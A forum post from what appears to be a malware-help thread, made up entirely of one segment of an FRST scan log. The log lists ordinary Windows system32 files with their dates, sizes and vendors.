Author Topic: File Type Question  (Read 20173 times)

0 Members and 1 Guest are viewing this topic.

Offline Ozzie

  • Full Member
  • ***
  • Posts: 55
    • View Profile
Re: File Type Question
« Reply #30 on: January 25, 2017, 08:55:57 PM »
16th continuation of FRST

2016-12-03 08:34 - 2016-12-03 08:34 - 00055296 _____ (Microsoft Corporation) C:\WINDOWS\system32\dusmapi.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00055296 _____ (Microsoft Corporation) C:\WINDOWS\system32\drttransport.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00055272 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsass.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00054784 _____ (Microsoft) C:\WINDOWS\system32\fpb.rs
2016-12-03 08:34 - 2016-12-03 08:34 - 00054784 _____ (Microsoft Corporation) C:\WINDOWS\system32\NfcRadioMedia.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00054784 _____ (Microsoft Corporation) C:\WINDOWS\system32\MultiDigiMon.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00054784 _____ (Microsoft Corporation) C:\WINDOWS\system32\MbaeXmlParser.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00054784 _____ (Microsoft Corporation) C:\WINDOWS\system32\iyuv_32.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00054784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Geocommon.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00054784 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmocx.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00054272 _____ (Microsoft Corporation) C:\WINDOWS\system32\Wwanpref.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00054272 _____ (Microsoft Corporation) C:\WINDOWS\system32\RegCtrl.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00054272 _____ (Microsoft Corporation) C:\WINDOWS\system32\LanguageComponentsInstallerComHandler.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00054272 _____ (Microsoft Corporation) C:\WINDOWS\system32\DdcComImplementations.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00054272 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DSCache.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00053760 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.UI.BioEnrollment.ProxyStub.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00053760 _____ (Microsoft Corporation) C:\WINDOWS\system32\spopk.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00053760 _____ (Microsoft Corporation) C:\WINDOWS\system32\sdiagschd.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00053760 _____ (Microsoft Corporation) C:\WINDOWS\system32\pnppolicy.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00053760 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\watchdog.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00053760 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\filecrypt.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00053760 _____ (Microsoft Corporation) C:\WINDOWS\system32\cscapi.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00053760 _____ (Microsoft Corporation) C:\WINDOWS\system32\CertEnrollCtrl.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00053640 _____ (Microsoft Corporation) C:\WINDOWS\system32\PickerHost.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00053520 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\urscx01000.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00053248 _____ (Microsoft Corporation) C:\WINDOWS\system32\jsproxy.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00053248 _____ (Microsoft Corporation) C:\WINDOWS\system32\imgutil.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00053248 _____ (Microsoft Corporation) C:\WINDOWS\system32\edpnotify.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00053248 _____ (Microsoft Corporation) C:\WINDOWS\system32\cmdl32.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00053248 _____ (Microsoft Corporation) C:\WINDOWS\system32\ByteCodeGenerator.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00052736 _____ (Microsoft Corporation) C:\WINDOWS\system32\virtdisk.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00052736 _____ (Microsoft Corporation) C:\WINDOWS\system32\ETWESEProviderResources.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00052496 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\netbios.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00052224 _____ (Microsoft) C:\WINDOWS\system32\esrb.rs
2016-12-03 08:34 - 2016-12-03 08:34 - 00052224 _____ (Microsoft Corporation) C:\WINDOWS\system32\ustprov.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00052224 _____ (Microsoft Corporation) C:\WINDOWS\system32\SCardBi.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00052224 _____ (Microsoft Corporation) C:\WINDOWS\system32\PSModuleDiscoveryProvider.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00052224 _____ (Microsoft Corporation) C:\WINDOWS\system32\pcacli.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00052224 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfh263enc.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00052224 _____ (Microsoft Corporation) C:\WINDOWS\system32\joinproviderol.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00052224 _____ (Microsoft Corporation) C:\WINDOWS\system32\grpconv.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00052224 _____ (Microsoft Corporation) C:\WINDOWS\system32\auditpolcore.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00051984 _____ (Microsoft Corporation) C:\WINDOWS\system32\mspatcha.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00051712 _____ (Microsoft Corporation) C:\WINDOWS\system32\syncmlhook.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00051712 _____ (Microsoft Corporation) C:\WINDOWS\system32\RoamingSecurity.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00051712 _____ (Microsoft Corporation) C:\WINDOWS\system32\lodctr.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00051712 _____ (Microsoft Corporation) C:\WINDOWS\system32\lltdapi.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00051712 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmloader.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00051712 _____ (Microsoft Corporation) C:\WINDOWS\system32\amsi.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00051472 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\condrv.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00051200 _____ (Microsoft Corporation) C:\WINDOWS\system32\vmictimeprovider.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00051200 _____ (Microsoft Corporation) C:\WINDOWS\system32\SortWindows61.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00051200 _____ (Microsoft Corporation) C:\WINDOWS\system32\sfc_os.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00051200 _____ (Microsoft Corporation) C:\WINDOWS\system32\pcaui.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00051200 _____ (Microsoft Corporation) C:\WINDOWS\system32\NAPCRYPT.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00051200 _____ (Microsoft Corporation) C:\WINDOWS\system32\mcicda.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00051200 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\winhvr.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00051200 _____ (Microsoft Corporation) C:\WINDOWS\system32\deskadp.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00051200 _____ (Microsoft Corporation) C:\WINDOWS\system32\ComputerDefaults.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00050688 _____ (Microsoft Corporation) C:\WINDOWS\system32\winrs.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00050688 _____ (Microsoft Corporation) C:\WINDOWS\system32\WcnNetsh.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00050688 _____ (Microsoft Corporation) C:\WINDOWS\system32\sscore.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00050688 _____ (Microsoft Corporation) C:\WINDOWS\system32\iaspolcy.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00050688 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpipreg.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00050688 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ndiscap.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00050688 _____ (Microsoft Corporation) C:\WINDOWS\system32\cmgrcspps.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00050688 _____ (Microsoft Corporation) C:\WINDOWS\system32\catsrvps.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00050608 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensorsUtilsV2.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00050568 _____ (Microsoft Corporation) C:\WINDOWS\system32\ApplicationFrameHost.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00050176 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBrokerUI.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00050176 _____ (Microsoft Corporation) C:\WINDOWS\system32\printfilterpipelineprxy.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00050176 _____ (Microsoft Corporation) C:\WINDOWS\system32\forfiles.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00050176 _____ (Microsoft Corporation) C:\WINDOWS\system32\EtwRundown.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00050112 _____ C:\WINDOWS\system32\normnfc.nls
2016-12-03 08:34 - 2016-12-03 08:34 - 00049936 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WdfLdr.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00049664 ____R (Microsoft Corporation) C:\WINDOWS\system32\Windows.Mirage.Internal.Capture.Pipeline.ProxyStub.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00049664 _____ (Microsoft Corporation) C:\WINDOWS\system32\OnDemandBrokerClient.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00049664 _____ (Microsoft Corporation) C:\WINDOWS\system32\kmddsp.tsp
2016-12-03 08:34 - 2016-12-03 08:34 - 00049664 _____ (Microsoft Corporation) C:\WINDOWS\system32\fodhelper.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00049664 _____ (Microsoft Corporation) C:\WINDOWS\system32\deviceassociation.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00049664 _____ (Microsoft Corporation) C:\WINDOWS\system32\deskmon.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00049616 _____ (Microsoft Corporation) C:\WINDOWS\system32\kernel.appcore.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00049152 _____ (Microsoft Corporation) C:\WINDOWS\system32\WUDFCoinstaller.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00049152 _____ (Microsoft Corporation) C:\WINDOWS\system32\wfdprov.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00049152 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbisurf.ax
2016-12-03 08:34 - 2016-12-03 08:34 - 00049152 _____ (Microsoft Corporation) C:\WINDOWS\system32\rrinstaller.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00049152 _____ (Microsoft Corporation) C:\WINDOWS\system32\odbcbcp.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00049152 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetEvtFwdr.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00049152 _____ (Microsoft Corporation) C:\WINDOWS\system32\nci.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00049152 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmler.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00049152 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mmcss.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00049032 _____ (Microsoft Corporation) C:\WINDOWS\system32\iri.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00049032 _____ (Microsoft Corporation) C:\WINDOWS\system32\dsclient.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00048640 _____ (Microsoft Corporation) C:\WINDOWS\system32\XInputUap.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00048640 _____ (Microsoft Corporation) C:\WINDOWS\system32\xcopy.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00048640 _____ (Microsoft Corporation) C:\WINDOWS\system32\winbioext.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00048640 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataTypeHelperUtil.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00048640 _____ (Microsoft Corporation) C:\WINDOWS\system32\ProximityServicePal.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00048640 _____ (Microsoft Corporation) C:\WINDOWS\system32\notificationplatformcomponent.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00048640 _____ (Microsoft Corporation) C:\WINDOWS\system32\lfsvc.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00048640 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\qwavedrv.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00048560 _____ (Microsoft Corporation) C:\WINDOWS\system32\iuilp.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00048128 _____ (Microsoft Corporation) C:\WINDOWS\system32\Websocket.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00048128 _____ (Microsoft Corporation) C:\WINDOWS\system32\typeperf.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00048128 _____ (Microsoft Corporation) C:\WINDOWS\system32\SyncHost.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00048128 _____ (Microsoft Corporation) C:\WINDOWS\system32\rtffilt.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00048128 _____ (Microsoft Corporation) C:\WINDOWS\system32\fhuxcommon.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00048128 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceDriverRetrievalClient.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00048128 _____ (Microsoft Corporation) C:\WINDOWS\system32\CspCellularSettings.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00048128 _____ (Microsoft Corporation) C:\WINDOWS\system32\cmgrcspsvr.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00048072 _____ (Microsoft Corporation) C:\WINDOWS\system32\tbs.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00047682 _____ C:\WINDOWS\system32\diskmgmt.msc
2016-12-03 08:34 - 2016-12-03 08:34 - 00047616 _____ (Microsoft Corporation) C:\WINDOWS\system32\SortServer2003Compat.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00047616 _____ (Microsoft Corporation) C:\WINDOWS\system32\pcadm.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00047616 _____ (Microsoft Corporation) C:\WINDOWS\system32\linkinfo.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00047616 _____ (Microsoft Corporation) C:\WINDOWS\system32\CredentialMigrationHandler.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00047616 _____ (Microsoft Corporation) C:\WINDOWS\system32\cipher.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00047376 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pcw.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00047104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSAlacDecoder.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00047104 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmiclnt.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00047104 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdrleakdiag.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00047104 _____ (Microsoft Corporation) C:\WINDOWS\system32\perfctrs.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00047104 _____ (Microsoft Corporation) C:\WINDOWS\system32\ndfetw.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00047104 _____ (Microsoft Corporation) C:\WINDOWS\system32\iernonce.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00047104 _____ (Microsoft Corporation) C:\WINDOWS\system32\ErrorDetailsCore.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00047104 _____ (Microsoft Corporation) C:\WINDOWS\system32\embeddedmodesvcapi.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00046908 _____ C:\WINDOWS\system32\OutdoorAudioEnvironment.bin
2016-12-03 08:34 - 2016-12-03 08:34 - 00046592 _____ (Microsoft Corporation) C:\WINDOWS\system32\wincredprovider.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00046592 _____ (Microsoft Corporation) C:\WINDOWS\system32\ucsvc.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00046592 _____ (Microsoft Corporation) C:\WINDOWS\system32\sxshared.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00046592 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecurityHealthProxyStub.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00046592 _____ (Microsoft Corporation) C:\WINDOWS\system32\lpkinstall.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00046592 _____ (Microsoft Corporation) C:\WINDOWS\system32\dimsroam.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00046592 _____ (Microsoft Corporation) C:\WINDOWS\system32\dimsjob.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00046592 _____ (Microsoft Corporation) C:\WINDOWS\system32\credui.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00046592 _____ (Microsoft Corporation) C:\WINDOWS\system32\cmlua.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00046080 _____ (Microsoft) C:\WINDOWS\system32\oflc-nz.rs
2016-12-03 08:34 - 2016-12-03 08:34 - 00046080 _____ (Microsoft Corporation) C:\WINDOWS\system32\VoiceActivationManager.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00046080 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataLanguageUtil.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00046080 _____ (Microsoft Corporation) C:\WINDOWS\system32\TpmTasks.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00046080 _____ (Microsoft Corporation) C:\WINDOWS\system32\pid.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00046080 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfvfw.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00045568 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Portable.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00045568 _____ (Microsoft Corporation) C:\WINDOWS\system32\uicom.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00045568 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\Udecx.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00045328 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\iorate.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00045228 _____ C:\WINDOWS\system32\hypervisor.mof
2016-12-03 08:34 - 2016-12-03 08:34 - 00045056 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Printers.Extensions.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00045056 _____ (Microsoft Corporation) C:\WINDOWS\system32\LicenseManagerShellext.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00045056 _____ (Microsoft Corporation) C:\WINDOWS\system32\LaunchWinApp.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00045056 _____ (Microsoft Corporation) C:\WINDOWS\system32\compact.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00044904 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockScreenContentServer.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00044544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netfxperf.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00044544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfh263enc.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00044544 _____ (Microsoft Corporation) C:\WINDOWS\system32\tpmcompc.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00044544 _____ (Microsoft Corporation) C:\WINDOWS\system32\relog.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00044544 _____ (Microsoft Corporation) C:\WINDOWS\system32\netfxperf.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00044544 _____ (Microsoft Corporation) C:\WINDOWS\system32\MsiCofire.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00044544 _____ (Microsoft Corporation) C:\WINDOWS\system32\DafDnsSd.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00044032 _____ (Microsoft) C:\WINDOWS\system32\csrr.rs
2016-12-03 08:34 - 2016-12-03 08:34 - 00044032 _____ (Microsoft Corporation) C:\WINDOWS\system32\traffic.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00044032 _____ (Microsoft Corporation) C:\WINDOWS\system32\nshhttp.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00044032 _____ (Microsoft Corporation) C:\WINDOWS\system32\mciqtz32.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00044032 _____ (Microsoft Corporation) C:\WINDOWS\system32\EAMProgressHandler.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00044032 _____ (Microsoft Corporation) C:\WINDOWS\system32\cttunesvr.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00044032 _____ (Microsoft Corporation) C:\WINDOWS\system32\cmintegrator.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00043880 _____ (Microsoft Corporation) C:\WINDOWS\system32\RuntimeBroker.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00043566 _____ C:\WINDOWS\system32\normnfd.nls
2016-12-03 08:34 - 2016-12-03 08:34 - 00043520 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsplib.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00043520 _____ (Microsoft Corporation) C:\WINDOWS\system32\WordBreakers.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00043520 _____ (Microsoft Corporation) C:\WINDOWS\system32\UI0Detect.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00043520 _____ (Microsoft Corporation) C:\WINDOWS\system32\tokenbinding.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00043520 _____ (Microsoft Corporation) C:\WINDOWS\system32\tetheringconfigsp.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00043520 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockScreenContentHost.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00043520 _____ (Microsoft Corporation) C:\WINDOWS\system32\efsext.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00043520 _____ (Microsoft Corporation) C:\WINDOWS\system32\cmmon32.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00043131 _____ C:\WINDOWS\mib.bin
2016-12-03 08:34 - 2016-12-03 08:34 - 00043008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\browcli.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00043008 _____ (Microsoft Corporation) C:\WINDOWS\system32\UsbCApi.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00043008 _____ (Microsoft Corporation) C:\WINDOWS\system32\sfc.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00043008 _____ (Microsoft Corporation) C:\WINDOWS\system32\eventcreate.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00043008 _____ (Microsoft Corporation) C:\WINDOWS\system32\efsutil.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00043008 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\scfilter.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00043008 _____ (Microsoft Corporation) C:\WINDOWS\system32\docprop.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00043008 _____ (Microsoft Corporation) C:\WINDOWS\system32\dataclen.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00042496 _____ (Microsoft Corporation) C:\WINDOWS\system32\WwaExt.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00042496 _____ (Microsoft Corporation) C:\WINDOWS\system32\unlodctr.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00042496 _____ (Microsoft Corporation) C:\WINDOWS\system32\mapsupdatetask.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00042496 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\nsiproxy.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00042496 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\modem.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00042344 _____ (Microsoft Corporation) C:\WINDOWS\system32\netutils.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00041984 _____ (Microsoft Corporation) C:\WINDOWS\system32\perfproc.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00041984 _____ (Microsoft Corporation) C:\WINDOWS\system32\perfos.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00041984 _____ (Microsoft Corporation) C:\WINDOWS\system32\navshutdown.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00041856 _____ (Microsoft Corporation) C:\WINDOWS\system32\svchost.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00041587 _____ C:\WINDOWS\system32\azman.msc
2016-12-03 08:34 - 2016-12-03 08:34 - 00041472 _____ (Microsoft) C:\WINDOWS\system32\cob-au.rs
2016-12-03 08:34 - 2016-12-03 08:34 - 00041472 _____ (Microsoft Corporation) C:\WINDOWS\system32\where.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00041472 _____ (Microsoft Corporation) C:\WINDOWS\system32\upnpcont.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00041472 _____ (Microsoft Corporation) C:\WINDOWS\system32\gpprnext.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00041232 _____ (Microsoft Corporation) C:\WINDOWS\system32\kdusb.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00040960 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecEdit.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00040960 _____ (Microsoft Corporation) C:\WINDOWS\system32\perfdisk.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00040960 _____ (Microsoft Corporation) C:\WINDOWS\system32\Netplwiz.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00040960 _____ (Microsoft Corporation) C:\WINDOWS\system32\mimefilt.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00040960 _____ (Microsoft Corporation) C:\WINDOWS\system32\hidphone.tsp
2016-12-03 08:34 - 2016-12-03 08:34 - 00040960 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vwifimp.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00040960 _____ (Microsoft Corporation) C:\WINDOWS\system32\bthudtask.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00040768 _____ (Microsoft Corporation) C:\WINDOWS\system32\PasswordOnWakeSettingFlyout.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00040768 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WdBoot.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00040720 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\werkernel.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00040448 _____ (Microsoft Corporation) C:\WINDOWS\system32\XblGameSaveProxy.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00040448 _____ (Microsoft Corporation) C:\WINDOWS\system32\whealogr.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00040448 _____ (Microsoft Corporation) C:\WINDOWS\system32\waitfor.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00040448 _____ (Microsoft Corporation) C:\WINDOWS\system32\PackagedCWALauncher.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00040448 _____ (Microsoft Corporation) C:\WINDOWS\system32\gmsaclient.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00040448 _____ (Microsoft Corporation) C:\WINDOWS\system32\dsauth.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00040208 _____ (Microsoft Corporation) C:\WINDOWS\system32\SysResetErr.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00039936 _____ C:\WINDOWS\system32\SpectrumSyncClient.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00039936 _____ (Microsoft Corporation) C:\WINDOWS\system32\wiawow64.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00039936 _____ (Microsoft Corporation) C:\WINDOWS\system32\SetNetworkLocationFlyout.dll
